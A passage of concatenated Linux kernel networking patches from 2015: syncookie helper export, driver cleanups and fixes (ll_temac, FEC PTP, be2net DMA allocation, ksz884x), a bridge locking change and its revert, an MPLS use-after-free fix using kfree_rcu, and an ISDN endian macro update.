Miller --- include/net/tcp.h | 3 +++ net/ipv4/syncookies.c | 10 +++++----- net/ipv6/syncookies.c | 19 +------------------ 3 files changed, 9 insertions(+), 23 deletions(-) diff --git a/include/net/tcp.h b/include/net/tcp.h index 2bb2bad21d5c..978cebedd3fc 100644 --- a/include/net/tcp.h +++ b/include/net/tcp.h @@ -469,6 +469,9 @@ int tcp_send_rcvq(struct sock *sk, struct msghdr *msg, size_t size); void inet_sk_rx_dst_set(struct sock *sk, const struct sk_buff *skb); /* From syncookies.c */ +struct sock *tcp_get_cookie_sock(struct sock *sk, struct sk_buff *skb, + struct request_sock *req, + struct dst_entry *dst); int __cookie_v4_check(const struct iphdr *iph, const struct tcphdr *th, u32 cookie); struct sock *cookie_v4_check(struct sock *sk, struct sk_buff *skb); diff --git a/net/ipv4/syncookies.c b/net/ipv4/syncookies.c index df849e5a10f1..d70b1f603692 100644 --- a/net/ipv4/syncookies.c +++ b/net/ipv4/syncookies.c @@ -219,9 +219,9 @@ int __cookie_v4_check(const struct iphdr *iph, const struct tcphdr *th, } EXPORT_SYMBOL_GPL(__cookie_v4_check); -static struct sock *get_cookie_sock(struct sock *sk, struct sk_buff *skb, - struct request_sock *req, - struct dst_entry *dst) +struct sock *tcp_get_cookie_sock(struct sock *sk, struct sk_buff *skb, + struct request_sock *req, + struct dst_entry *dst) { struct inet_connection_sock *icsk = inet_csk(sk); struct sock *child; @@ -235,7 +235,7 @@ static struct sock *get_cookie_sock(struct sock *sk, struct sk_buff *skb, } return child; } - +EXPORT_SYMBOL(tcp_get_cookie_sock); /* * when syncookies are in effect and tcp timestamps are enabled we stored @@ -391,7 +391,7 @@ struct sock *cookie_v4_check(struct sock *sk, struct sk_buff *skb) ireq->rcv_wscale = rcv_wscale; ireq->ecn_ok = cookie_ecn_ok(&tcp_opt, sock_net(sk), &rt->dst); - ret = get_cookie_sock(sk, skb, req, &rt->dst); + ret = tcp_get_cookie_sock(sk, skb, req, &rt->dst); /* ip_queue_xmit() depends on our flow being setup * Normal sockets get it right from inet_csk_route_child_sock() */ diff --git a/net/ipv6/syncookies.c b/net/ipv6/syncookies.c index 21bc2eb53c57..0909f4e0d53c 100644 --- a/net/ipv6/syncookies.c +++ b/net/ipv6/syncookies.c @@ -41,23 +41,6 @@ static __u16 const msstab[] = { 9000 - 60, }; -static inline struct sock *get_cookie_sock(struct sock *sk, struct sk_buff *skb, - struct request_sock *req, - struct dst_entry *dst) -{ - struct inet_connection_sock *icsk = inet_csk(sk); - struct sock *child; - - child = icsk->icsk_af_ops->syn_recv_sock(sk, skb, req, dst); - if (child) { - atomic_set(&req->rsk_refcnt, 1); - inet_csk_reqsk_queue_add(sk, req, child); - } else { - reqsk_free(req); - } - return child; -} - static DEFINE_PER_CPU(__u32 [16 + 5 + SHA_WORKSPACE_WORDS], ipv6_cookie_scratch); @@ -264,7 +247,7 @@ struct sock *cookie_v6_check(struct sock *sk, struct sk_buff *skb) ireq->rcv_wscale = rcv_wscale; ireq->ecn_ok = cookie_ecn_ok(&tcp_opt, sock_net(sk), dst); - ret = get_cookie_sock(sk, skb, req, dst); + ret = tcp_get_cookie_sock(sk, skb, req, dst); out: return ret; out_free: From 84ea0ded3462c6a75f2f9ff898fa736dcab2d737 Mon Sep 17 00:00:00 2001 From: Michal Simek Date: Fri, 5 Jun 2015 10:49:17 +0200 Subject: [PATCH 754/872] net: ll_temac: Remove sparse warnings Remove sparse warnings: drivers/net/ethernet/xilinx/ll_temac_main.c:65:16: warning: cast removes address space of expression drivers/net/ethernet/xilinx/ll_temac_main.c:70:9: warning: cast removes address space of expression drivers/net/ethernet/xilinx/ll_temac_main.c:127:16: warning: cast removes address space of expression 
drivers/net/ethernet/xilinx/ll_temac_main.c:137:9: warning: cast removes address space of expression drivers/net/ethernet/xilinx/ll_temac_main.c:409:3: warning: symbol 'temac_options' was not declared. Should it be static? drivers/net/ethernet/xilinx/ll_temac_main.c:590:6: warning: symbol 'temac_adjust_link' was not declared. Should it be static? Signed-off-by: Michal Simek Signed-off-by: David S. Miller --- drivers/net/ethernet/xilinx/ll_temac_main.c | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/drivers/net/ethernet/xilinx/ll_temac_main.c b/drivers/net/ethernet/xilinx/ll_temac_main.c index 3b99a4df71f8..5a1068df7038 100644 --- a/drivers/net/ethernet/xilinx/ll_temac_main.c +++ b/drivers/net/ethernet/xilinx/ll_temac_main.c @@ -62,12 +62,12 @@ u32 temac_ior(struct temac_local *lp, int offset) { - return in_be32((u32 *)(lp->regs + offset)); + return in_be32(lp->regs + offset); } void temac_iow(struct temac_local *lp, int offset, u32 value) { - out_be32((u32 *) (lp->regs + offset), value); + out_be32(lp->regs + offset, value); } int temac_indirect_busywait(struct temac_local *lp) @@ -124,7 +124,7 @@ void temac_indirect_out32(struct temac_local *lp, int reg, u32 value) */ static u32 temac_dma_in32(struct temac_local *lp, int reg) { - return in_be32((u32 *)(lp->sdma_regs + (reg << 2))); + return in_be32(lp->sdma_regs + (reg << 2)); } /** @@ -134,7 +134,7 @@ static u32 temac_dma_in32(struct temac_local *lp, int reg) */ static void temac_dma_out32(struct temac_local *lp, int reg, u32 value) { - out_be32((u32 *)(lp->sdma_regs + (reg << 2)), value); + out_be32(lp->sdma_regs + (reg << 2), value); } /* DMA register access functions can be DCR based or memory mapped. @@ -400,7 +400,7 @@ static void temac_set_multicast_list(struct net_device *ndev) mutex_unlock(&lp->indirect_mutex); } -struct temac_option { +static struct temac_option { int flg; u32 opt; u32 reg; @@ -587,7 +587,7 @@ static void temac_device_reset(struct net_device *ndev) ndev->trans_start = jiffies; /* prevent tx timeout */ } -void temac_adjust_link(struct net_device *ndev) +static void temac_adjust_link(struct net_device *ndev) { struct temac_local *lp = netdev_priv(ndev); struct phy_device *phy = lp->phy_dev; From 1d7c49037b12016e7056b9f2c990380e2187e766 Mon Sep 17 00:00:00 2001 From: Wilson Kok Date: Fri, 5 Jun 2015 00:52:57 -0700 Subject: [PATCH 755/872] bridge: use _bh spinlock variant for br_fdb_update to avoid lockup br_fdb_update() can be called in process context in the following way: br_fdb_add() -> __br_fdb_add() -> br_fdb_update() (if NTF_USE flag is set) so we need to use spin_lock_bh because there are softirq users of the hash_lock. One easy way to reproduce this is to modify the bridge utility to set NTF_USE, enable stp and then set maxageing to a low value so br_fdb_cleanup() is called frequently and then just add new entries in a loop. This happens because br_fdb_cleanup() is called from timer/softirq context. These locks were _bh before commit f8ae737deea1 ("[BRIDGE]: forwarding remove unneeded preempt and bh diasables") and at the time that commit was correct because br_fdb_update() couldn't be called from process context, but that changed after commit: 292d1398983f ("bridge: add NTF_USE support") Signed-off-by: Wilson Kok Signed-off-by: Nikolay Aleksandrov Fixes: 292d1398983f ("bridge: add NTF_USE support") Signed-off-by: David S. 
Miller --- net/bridge/br_fdb.c | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/net/bridge/br_fdb.c b/net/bridge/br_fdb.c index e0670d7054f9..7eacc8ae9779 100644 --- a/net/bridge/br_fdb.c +++ b/net/bridge/br_fdb.c @@ -569,7 +569,7 @@ void br_fdb_update(struct net_bridge *br, struct net_bridge_port *source, fdb_notify(br, fdb, RTM_NEWNEIGH); } } else { - spin_lock(&br->hash_lock); + spin_lock_bh(&br->hash_lock); if (likely(!fdb_find(head, addr, vid))) { fdb = fdb_create(head, source, addr, vid); if (fdb) { @@ -581,7 +581,7 @@ void br_fdb_update(struct net_bridge *br, struct net_bridge_port *source, /* else we lose race and someone else inserts * it first, don't bother updating */ - spin_unlock(&br->hash_lock); + spin_unlock_bh(&br->hash_lock); } } From 34270f5f6f1bcc2dc9d2e5aa28147667425cc424 Mon Sep 17 00:00:00 2001 From: Fugang Duan Date: Fri, 5 Jun 2015 17:22:08 +0800 Subject: [PATCH 756/872] net: fec: ptp: correct the ENET_ATCOR value The current driver adjust freq formula is: fe * diff = ppb * pc Note: fe: ENET ref clock frequency in Hz diff = inc_corr - inc: difference between default increment and correction increment ppb: parts per billion adjustment from base pc: correction period (in number of fe clock cycles) The correction increment will be used after N cycles of regular increments, not every N cycles (with N being the correction period). For example, set ENET_ATCOR=4, INC=8, INC_CORR=9, there will be 4 increments of 8 (ENET_ATINC[INC]) , followed by 1 increment of 9 (ENET_ATINC[INC_CORR]). So, the correct formula is: fe * diff = ppb * (pc + 1) For ENET_ATCOR, a value 0 disables the correction counter and no corrections occur. So base on the origin formula, set pc = pc > 1 ? pc - 1 : pc. Signed-off-by: Fugang Duan Signed-off-by: Frank Li Signed-off-by: David S. Miller --- drivers/net/ethernet/freescale/fec_ptp.c | 1 + 1 file changed, 1 insertion(+) diff --git a/drivers/net/ethernet/freescale/fec_ptp.c b/drivers/net/ethernet/freescale/fec_ptp.c index a583d89b13c4..a15663ad7f5e 100644 --- a/drivers/net/ethernet/freescale/fec_ptp.c +++ b/drivers/net/ethernet/freescale/fec_ptp.c @@ -353,6 +353,7 @@ static int fec_ptp_adjfreq(struct ptp_clock_info *ptp, s32 ppb) tmp = readl(fep->hwp + FEC_ATIME_INC) & FEC_T_INC_MASK; tmp |= corr_ns << FEC_T_INC_CORR_OFFSET; writel(tmp, fep->hwp + FEC_ATIME_INC); + corr_period = corr_period > 1 ? corr_period - 1 : corr_period; writel(corr_period, fep->hwp + FEC_ATIME_CORR); /* dummy read to update the timer. */ timecounter_read(&fep->tc); From e51000db4c880165eab06ec0990605f24e75203f Mon Sep 17 00:00:00 2001 From: Sriharsha Basavapatna Date: Fri, 5 Jun 2015 15:33:59 +0530 Subject: [PATCH 757/872] be2net: Replace dma/pci_alloc_coherent() calls with dma_zalloc_coherent() There are several places in the driver (all in control paths) where coherent dma memory is being allocated using either dma_alloc_coherent() or the deprecated pci_alloc_consistent(). All these calls should be changed to use dma_zalloc_coherent() to avoid uninitialized fields in data structures backed by this memory. Reported-by: Joerg Roedel Tested-by: Joerg Roedel Signed-off-by: Sriharsha Basavapatna Signed-off-by: David S. 
Miller --- drivers/net/ethernet/emulex/benet/be_cmds.c | 87 +++++++++++-------- .../net/ethernet/emulex/benet/be_ethtool.c | 18 ++-- drivers/net/ethernet/emulex/benet/be_main.c | 15 ++-- 3 files changed, 67 insertions(+), 53 deletions(-) diff --git a/drivers/net/ethernet/emulex/benet/be_cmds.c b/drivers/net/ethernet/emulex/benet/be_cmds.c index fb140faeafb1..c5e1d0ac75f9 100644 --- a/drivers/net/ethernet/emulex/benet/be_cmds.c +++ b/drivers/net/ethernet/emulex/benet/be_cmds.c @@ -1720,9 +1720,9 @@ int be_cmd_get_regs(struct be_adapter *adapter, u32 buf_len, void *buf) total_size = buf_len; get_fat_cmd.size = sizeof(struct be_cmd_req_get_fat) + 60*1024; - get_fat_cmd.va = pci_alloc_consistent(adapter->pdev, - get_fat_cmd.size, - &get_fat_cmd.dma); + get_fat_cmd.va = dma_zalloc_coherent(&adapter->pdev->dev, + get_fat_cmd.size, + &get_fat_cmd.dma, GFP_ATOMIC); if (!get_fat_cmd.va) { dev_err(&adapter->pdev->dev, "Memory allocation failure while reading FAT data\n"); @@ -1767,8 +1767,8 @@ int be_cmd_get_regs(struct be_adapter *adapter, u32 buf_len, void *buf) log_offset += buf_size; } err: - pci_free_consistent(adapter->pdev, get_fat_cmd.size, - get_fat_cmd.va, get_fat_cmd.dma); + dma_free_coherent(&adapter->pdev->dev, get_fat_cmd.size, + get_fat_cmd.va, get_fat_cmd.dma); spin_unlock_bh(&adapter->mcc_lock); return status; } @@ -2215,12 +2215,12 @@ int be_cmd_read_port_transceiver_data(struct be_adapter *adapter, return -EINVAL; cmd.size = sizeof(struct be_cmd_resp_port_type); - cmd.va = pci_alloc_consistent(adapter->pdev, cmd.size, &cmd.dma); + cmd.va = dma_zalloc_coherent(&adapter->pdev->dev, cmd.size, &cmd.dma, + GFP_ATOMIC); if (!cmd.va) { dev_err(&adapter->pdev->dev, "Memory allocation failed\n"); return -ENOMEM; } - memset(cmd.va, 0, cmd.size); spin_lock_bh(&adapter->mcc_lock); @@ -2245,7 +2245,7 @@ int be_cmd_read_port_transceiver_data(struct be_adapter *adapter, } err: spin_unlock_bh(&adapter->mcc_lock); - pci_free_consistent(adapter->pdev, cmd.size, cmd.va, cmd.dma); + dma_free_coherent(&adapter->pdev->dev, cmd.size, cmd.va, cmd.dma); return status; } @@ -2720,7 +2720,8 @@ int be_cmd_get_phy_info(struct be_adapter *adapter) goto err; } cmd.size = sizeof(struct be_cmd_req_get_phy_info); - cmd.va = pci_alloc_consistent(adapter->pdev, cmd.size, &cmd.dma); + cmd.va = dma_zalloc_coherent(&adapter->pdev->dev, cmd.size, &cmd.dma, + GFP_ATOMIC); if (!cmd.va) { dev_err(&adapter->pdev->dev, "Memory alloc failure\n"); status = -ENOMEM; @@ -2754,7 +2755,7 @@ int be_cmd_get_phy_info(struct be_adapter *adapter) BE_SUPPORTED_SPEED_1GBPS; } } - pci_free_consistent(adapter->pdev, cmd.size, cmd.va, cmd.dma); + dma_free_coherent(&adapter->pdev->dev, cmd.size, cmd.va, cmd.dma); err: spin_unlock_bh(&adapter->mcc_lock); return status; @@ -2805,8 +2806,9 @@ int be_cmd_get_cntl_attributes(struct be_adapter *adapter) memset(&attribs_cmd, 0, sizeof(struct be_dma_mem)); attribs_cmd.size = sizeof(struct be_cmd_resp_cntl_attribs); - attribs_cmd.va = pci_alloc_consistent(adapter->pdev, attribs_cmd.size, - &attribs_cmd.dma); + attribs_cmd.va = dma_zalloc_coherent(&adapter->pdev->dev, + attribs_cmd.size, + &attribs_cmd.dma, GFP_ATOMIC); if (!attribs_cmd.va) { dev_err(&adapter->pdev->dev, "Memory allocation failure\n"); status = -ENOMEM; @@ -2833,8 +2835,8 @@ int be_cmd_get_cntl_attributes(struct be_adapter *adapter) err: mutex_unlock(&adapter->mbox_lock); if (attribs_cmd.va) - pci_free_consistent(adapter->pdev, attribs_cmd.size, - attribs_cmd.va, attribs_cmd.dma); + dma_free_coherent(&adapter->pdev->dev, 
attribs_cmd.size, + attribs_cmd.va, attribs_cmd.dma); return status; } @@ -2972,9 +2974,10 @@ int be_cmd_get_mac_from_list(struct be_adapter *adapter, u8 *mac, memset(&get_mac_list_cmd, 0, sizeof(struct be_dma_mem)); get_mac_list_cmd.size = sizeof(struct be_cmd_resp_get_mac_list); - get_mac_list_cmd.va = pci_alloc_consistent(adapter->pdev, - get_mac_list_cmd.size, - &get_mac_list_cmd.dma); + get_mac_list_cmd.va = dma_zalloc_coherent(&adapter->pdev->dev, + get_mac_list_cmd.size, + &get_mac_list_cmd.dma, + GFP_ATOMIC); if (!get_mac_list_cmd.va) { dev_err(&adapter->pdev->dev, @@ -3047,8 +3050,8 @@ int be_cmd_get_mac_from_list(struct be_adapter *adapter, u8 *mac, out: spin_unlock_bh(&adapter->mcc_lock); - pci_free_consistent(adapter->pdev, get_mac_list_cmd.size, - get_mac_list_cmd.va, get_mac_list_cmd.dma); + dma_free_coherent(&adapter->pdev->dev, get_mac_list_cmd.size, + get_mac_list_cmd.va, get_mac_list_cmd.dma); return status; } @@ -3101,8 +3104,8 @@ int be_cmd_set_mac_list(struct be_adapter *adapter, u8 *mac_array, memset(&cmd, 0, sizeof(struct be_dma_mem)); cmd.size = sizeof(struct be_cmd_req_set_mac_list); - cmd.va = dma_alloc_coherent(&adapter->pdev->dev, cmd.size, - &cmd.dma, GFP_KERNEL); + cmd.va = dma_zalloc_coherent(&adapter->pdev->dev, cmd.size, &cmd.dma, + GFP_KERNEL); if (!cmd.va) return -ENOMEM; @@ -3291,7 +3294,8 @@ int be_cmd_get_acpi_wol_cap(struct be_adapter *adapter) memset(&cmd, 0, sizeof(struct be_dma_mem)); cmd.size = sizeof(struct be_cmd_resp_acpi_wol_magic_config_v1); - cmd.va = pci_alloc_consistent(adapter->pdev, cmd.size, &cmd.dma); + cmd.va = dma_zalloc_coherent(&adapter->pdev->dev, cmd.size, &cmd.dma, + GFP_ATOMIC); if (!cmd.va) { dev_err(&adapter->pdev->dev, "Memory allocation failure\n"); status = -ENOMEM; @@ -3326,7 +3330,8 @@ int be_cmd_get_acpi_wol_cap(struct be_adapter *adapter) err: mutex_unlock(&adapter->mbox_lock); if (cmd.va) - pci_free_consistent(adapter->pdev, cmd.size, cmd.va, cmd.dma); + dma_free_coherent(&adapter->pdev->dev, cmd.size, cmd.va, + cmd.dma); return status; } @@ -3340,8 +3345,9 @@ int be_cmd_set_fw_log_level(struct be_adapter *adapter, u32 level) memset(&extfat_cmd, 0, sizeof(struct be_dma_mem)); extfat_cmd.size = sizeof(struct be_cmd_resp_get_ext_fat_caps); - extfat_cmd.va = pci_alloc_consistent(adapter->pdev, extfat_cmd.size, - &extfat_cmd.dma); + extfat_cmd.va = dma_zalloc_coherent(&adapter->pdev->dev, + extfat_cmd.size, &extfat_cmd.dma, + GFP_ATOMIC); if (!extfat_cmd.va) return -ENOMEM; @@ -3363,8 +3369,8 @@ int be_cmd_set_fw_log_level(struct be_adapter *adapter, u32 level) status = be_cmd_set_ext_fat_capabilites(adapter, &extfat_cmd, cfgs); err: - pci_free_consistent(adapter->pdev, extfat_cmd.size, extfat_cmd.va, - extfat_cmd.dma); + dma_free_coherent(&adapter->pdev->dev, extfat_cmd.size, extfat_cmd.va, + extfat_cmd.dma); return status; } @@ -3377,8 +3383,9 @@ int be_cmd_get_fw_log_level(struct be_adapter *adapter) memset(&extfat_cmd, 0, sizeof(struct be_dma_mem)); extfat_cmd.size = sizeof(struct be_cmd_resp_get_ext_fat_caps); - extfat_cmd.va = pci_alloc_consistent(adapter->pdev, extfat_cmd.size, - &extfat_cmd.dma); + extfat_cmd.va = dma_zalloc_coherent(&adapter->pdev->dev, + extfat_cmd.size, &extfat_cmd.dma, + GFP_ATOMIC); if (!extfat_cmd.va) { dev_err(&adapter->pdev->dev, "%s: Memory allocation failure\n", @@ -3396,8 +3403,8 @@ int be_cmd_get_fw_log_level(struct be_adapter *adapter) level = cfgs->module[0].trace_lvl[j].dbg_lvl; } } - pci_free_consistent(adapter->pdev, extfat_cmd.size, extfat_cmd.va, - extfat_cmd.dma); + 
dma_free_coherent(&adapter->pdev->dev, extfat_cmd.size, extfat_cmd.va, + extfat_cmd.dma); err: return level; } @@ -3595,7 +3602,8 @@ int be_cmd_get_func_config(struct be_adapter *adapter, struct be_resources *res) memset(&cmd, 0, sizeof(struct be_dma_mem)); cmd.size = sizeof(struct be_cmd_resp_get_func_config); - cmd.va = pci_alloc_consistent(adapter->pdev, cmd.size, &cmd.dma); + cmd.va = dma_zalloc_coherent(&adapter->pdev->dev, cmd.size, &cmd.dma, + GFP_ATOMIC); if (!cmd.va) { dev_err(&adapter->pdev->dev, "Memory alloc failure\n"); status = -ENOMEM; @@ -3635,7 +3643,8 @@ int be_cmd_get_func_config(struct be_adapter *adapter, struct be_resources *res) err: mutex_unlock(&adapter->mbox_lock); if (cmd.va) - pci_free_consistent(adapter->pdev, cmd.size, cmd.va, cmd.dma); + dma_free_coherent(&adapter->pdev->dev, cmd.size, cmd.va, + cmd.dma); return status; } @@ -3656,7 +3665,8 @@ int be_cmd_get_profile_config(struct be_adapter *adapter, memset(&cmd, 0, sizeof(struct be_dma_mem)); cmd.size = sizeof(struct be_cmd_resp_get_profile_config); - cmd.va = pci_alloc_consistent(adapter->pdev, cmd.size, &cmd.dma); + cmd.va = dma_zalloc_coherent(&adapter->pdev->dev, cmd.size, &cmd.dma, + GFP_ATOMIC); if (!cmd.va) return -ENOMEM; @@ -3702,7 +3712,8 @@ int be_cmd_get_profile_config(struct be_adapter *adapter, res->vf_if_cap_flags = vf_res->cap_flags; err: if (cmd.va) - pci_free_consistent(adapter->pdev, cmd.size, cmd.va, cmd.dma); + dma_free_coherent(&adapter->pdev->dev, cmd.size, cmd.va, + cmd.dma); return status; } @@ -3717,7 +3728,8 @@ static int be_cmd_set_profile_config(struct be_adapter *adapter, void *desc, memset(&cmd, 0, sizeof(struct be_dma_mem)); cmd.size = sizeof(struct be_cmd_req_set_profile_config); - cmd.va = pci_alloc_consistent(adapter->pdev, cmd.size, &cmd.dma); + cmd.va = dma_zalloc_coherent(&adapter->pdev->dev, cmd.size, &cmd.dma, + GFP_ATOMIC); if (!cmd.va) return -ENOMEM; @@ -3733,7 +3745,8 @@ static int be_cmd_set_profile_config(struct be_adapter *adapter, void *desc, status = be_cmd_notify_wait(adapter, &wrb); if (cmd.va) - pci_free_consistent(adapter->pdev, cmd.size, cmd.va, cmd.dma); + dma_free_coherent(&adapter->pdev->dev, cmd.size, cmd.va, + cmd.dma); return status; } diff --git a/drivers/net/ethernet/emulex/benet/be_ethtool.c b/drivers/net/ethernet/emulex/benet/be_ethtool.c index b765c24625bf..2835dee5dc39 100644 --- a/drivers/net/ethernet/emulex/benet/be_ethtool.c +++ b/drivers/net/ethernet/emulex/benet/be_ethtool.c @@ -264,8 +264,8 @@ static int lancer_cmd_read_file(struct be_adapter *adapter, u8 *file_name, int status = 0; read_cmd.size = LANCER_READ_FILE_CHUNK; - read_cmd.va = pci_alloc_consistent(adapter->pdev, read_cmd.size, - &read_cmd.dma); + read_cmd.va = dma_zalloc_coherent(&adapter->pdev->dev, read_cmd.size, + &read_cmd.dma, GFP_ATOMIC); if (!read_cmd.va) { dev_err(&adapter->pdev->dev, @@ -289,8 +289,8 @@ static int lancer_cmd_read_file(struct be_adapter *adapter, u8 *file_name, break; } } - pci_free_consistent(adapter->pdev, read_cmd.size, read_cmd.va, - read_cmd.dma); + dma_free_coherent(&adapter->pdev->dev, read_cmd.size, read_cmd.va, + read_cmd.dma); return status; } @@ -818,8 +818,9 @@ static int be_test_ddr_dma(struct be_adapter *adapter) }; ddrdma_cmd.size = sizeof(struct be_cmd_req_ddrdma_test); - ddrdma_cmd.va = dma_alloc_coherent(&adapter->pdev->dev, ddrdma_cmd.size, - &ddrdma_cmd.dma, GFP_KERNEL); + ddrdma_cmd.va = dma_zalloc_coherent(&adapter->pdev->dev, + ddrdma_cmd.size, &ddrdma_cmd.dma, + GFP_KERNEL); if (!ddrdma_cmd.va) return -ENOMEM; @@ -941,8 +942,9 
@@ static int be_read_eeprom(struct net_device *netdev, memset(&eeprom_cmd, 0, sizeof(struct be_dma_mem)); eeprom_cmd.size = sizeof(struct be_cmd_req_seeprom_read); - eeprom_cmd.va = dma_alloc_coherent(&adapter->pdev->dev, eeprom_cmd.size, - &eeprom_cmd.dma, GFP_KERNEL); + eeprom_cmd.va = dma_zalloc_coherent(&adapter->pdev->dev, + eeprom_cmd.size, &eeprom_cmd.dma, + GFP_KERNEL); if (!eeprom_cmd.va) return -ENOMEM; diff --git a/drivers/net/ethernet/emulex/benet/be_main.c b/drivers/net/ethernet/emulex/benet/be_main.c index 6f9ffb9026cd..e43cc8a73ea7 100644 --- a/drivers/net/ethernet/emulex/benet/be_main.c +++ b/drivers/net/ethernet/emulex/benet/be_main.c @@ -4605,8 +4605,8 @@ static int lancer_fw_download(struct be_adapter *adapter, flash_cmd.size = sizeof(struct lancer_cmd_req_write_object) + LANCER_FW_DOWNLOAD_CHUNK; - flash_cmd.va = dma_alloc_coherent(dev, flash_cmd.size, - &flash_cmd.dma, GFP_KERNEL); + flash_cmd.va = dma_zalloc_coherent(dev, flash_cmd.size, + &flash_cmd.dma, GFP_KERNEL); if (!flash_cmd.va) return -ENOMEM; @@ -4739,8 +4739,8 @@ static int be_fw_download(struct be_adapter *adapter, const struct firmware* fw) } flash_cmd.size = sizeof(struct be_cmd_write_flashrom); - flash_cmd.va = dma_alloc_coherent(dev, flash_cmd.size, &flash_cmd.dma, - GFP_KERNEL); + flash_cmd.va = dma_zalloc_coherent(dev, flash_cmd.size, &flash_cmd.dma, + GFP_KERNEL); if (!flash_cmd.va) return -ENOMEM; @@ -5291,16 +5291,15 @@ static int be_drv_init(struct be_adapter *adapter) int status = 0; mbox_mem_alloc->size = sizeof(struct be_mcc_mailbox) + 16; - mbox_mem_alloc->va = dma_alloc_coherent(dev, mbox_mem_alloc->size, - &mbox_mem_alloc->dma, - GFP_KERNEL); + mbox_mem_alloc->va = dma_zalloc_coherent(dev, mbox_mem_alloc->size, + &mbox_mem_alloc->dma, + GFP_KERNEL); if (!mbox_mem_alloc->va) return -ENOMEM; mbox_mem_align->size = sizeof(struct be_mcc_mailbox); mbox_mem_align->va = PTR_ALIGN(mbox_mem_alloc->va, 16); mbox_mem_align->dma = PTR_ALIGN(mbox_mem_alloc->dma, 16); - memset(mbox_mem_align->va, 0, sizeof(struct be_mcc_mailbox)); rx_filter->size = sizeof(struct be_cmd_req_rx_filter); rx_filter->va = dma_zalloc_coherent(dev, rx_filter->size, From addae62e73cc7c2b0277d5069649be5594f0a5c8 Mon Sep 17 00:00:00 2001 From: Antonio Murdaca Date: Fri, 5 Jun 2015 18:58:38 +0200 Subject: [PATCH 758/872] ethernet: micrel: use time_is_before_eq_jiffies use time_is_before_eq_jiffies macro for time comparison Signed-off-by: Antonio Murdaca Signed-off-by: David S. Miller --- drivers/net/ethernet/micrel/ksz884x.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/net/ethernet/micrel/ksz884x.c b/drivers/net/ethernet/micrel/ksz884x.c index 48d2aecb0da9..75dc46c5fca2 100644 --- a/drivers/net/ethernet/micrel/ksz884x.c +++ b/drivers/net/ethernet/micrel/ksz884x.c @@ -6689,7 +6689,7 @@ static void mib_monitor(unsigned long ptr) /* This is used to verify Wake-on-LAN is working. */ if (hw_priv->pme_wait) { - if (hw_priv->pme_wait <= jiffies) { + if (time_is_before_eq_jiffies(hw_priv->pme_wait)) { hw_clr_wol_pme_status(&hw_priv->hw); hw_priv->pme_wait = 0; } From 25cc8f0763c972911b1a65099cd10d9f8a45a7b0 Mon Sep 17 00:00:00 2001 From: Robert Shearman Date: Fri, 5 Jun 2015 18:54:45 +0100 Subject: [PATCH 759/872] mpls: fix possible use after free of device The mpls device is used in an RCU read context without a lock being held. As the memory is freed without waiting for the RCU grace period to elapse, the freed memory could still be in use. 
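The deferred-free pattern adopted below, in rough generic form (a sketch only; the struct and function names are placeholders, not the mpls code):

	#include <linux/rcupdate.h>
	#include <linux/slab.h>

	struct demo_dev {
		int input_enabled;
		struct rcu_head rcu;		/* required by kfree_rcu() */
	};

	static void demo_teardown(struct demo_dev __rcu **slot)
	{
		struct demo_dev *d = rcu_dereference_protected(*slot, true);

		RCU_INIT_POINTER(*slot, NULL);
		kfree_rcu(d, rcu);	/* free is deferred past the RCU grace period */
	}
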
Address this by using kfree_rcu to free the memory for the mpls device after the RCU grace period has elapsed. Fixes: 03c57747a702 ("mpls: Per-device MPLS state") Signed-off-by: Robert Shearman Acked-by: "Eric W. Biederman" Signed-off-by: David S. Miller --- net/mpls/af_mpls.c | 2 +- net/mpls/internal.h | 1 + 2 files changed, 2 insertions(+), 1 deletion(-) diff --git a/net/mpls/af_mpls.c b/net/mpls/af_mpls.c index 7b3f732269e4..bff427f31924 100644 --- a/net/mpls/af_mpls.c +++ b/net/mpls/af_mpls.c @@ -541,7 +541,7 @@ static void mpls_ifdown(struct net_device *dev) RCU_INIT_POINTER(dev->mpls_ptr, NULL); - kfree(mdev); + kfree_rcu(mdev, rcu); } static int mpls_dev_notify(struct notifier_block *this, unsigned long event, diff --git a/net/mpls/internal.h b/net/mpls/internal.h index b064c345042c..8cabeb5a1cb9 100644 --- a/net/mpls/internal.h +++ b/net/mpls/internal.h @@ -16,6 +16,7 @@ struct mpls_dev { int input_enabled; struct ctl_table_header *sysctl; + struct rcu_head rcu; }; struct sk_buff; From 4e2987a188c56d269882d89d37b6128f71d3b2a0 Mon Sep 17 00:00:00 2001 From: Vaishali Thakkar Date: Sat, 6 Jun 2015 06:44:00 +0530 Subject: [PATCH 760/872] isdn/hisax: Convert use of __constant_cpu_to_le16 to cpu_to_le16 In big endian cases, macro cpu_to_le16 unfolds to __swab16 which provides special case for constants. In little endian cases, __constant_cpu_to_le16 and cpu_to_le16 expand directly to the same expression. So, replace __constant_cpu_to_le16 with cpu_to_le16 with the goal of getting rid of the definition of __constant_cpu_to_le16 completely. The semantic patch that performs this transformation is as follows: @@expression x;@@ - __constant_cpu_to_le16(x) + cpu_to_le16(x) Signed-off-by: Vaishali Thakkar Signed-off-by: David S. Miller --- drivers/isdn/hisax/st5481_usb.c | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/drivers/isdn/hisax/st5481_usb.c b/drivers/isdn/hisax/st5481_usb.c index ead0a4fb7448..a0fdbc074b98 100644 --- a/drivers/isdn/hisax/st5481_usb.c +++ b/drivers/isdn/hisax/st5481_usb.c @@ -267,8 +267,8 @@ int st5481_setup_usb(struct st5481_adapter *adapter) } // The descriptor is wrong for some early samples of the ST5481 chip - altsetting->endpoint[3].desc.wMaxPacketSize = __constant_cpu_to_le16(32); - altsetting->endpoint[4].desc.wMaxPacketSize = __constant_cpu_to_le16(32); + altsetting->endpoint[3].desc.wMaxPacketSize = cpu_to_le16(32); + altsetting->endpoint[4].desc.wMaxPacketSize = cpu_to_le16(32); // Use alternative setting 3 on interface 0 to have 2B+D if ((status = usb_set_interface(dev, 0, 3)) < 0) { From 7ff46e79fb7df5b09c46c36857929fdf039f8b31 Mon Sep 17 00:00:00 2001 From: "David S. Miller" Date: Sun, 7 Jun 2015 19:43:47 -0700 Subject: [PATCH 761/872] Revert "bridge: use _bh spinlock variant for br_fdb_update to avoid lockup" This reverts commit 1d7c49037b12016e7056b9f2c990380e2187e766. Nikolay Aleksandrov has a better version of this fix. Signed-off-by: David S. 
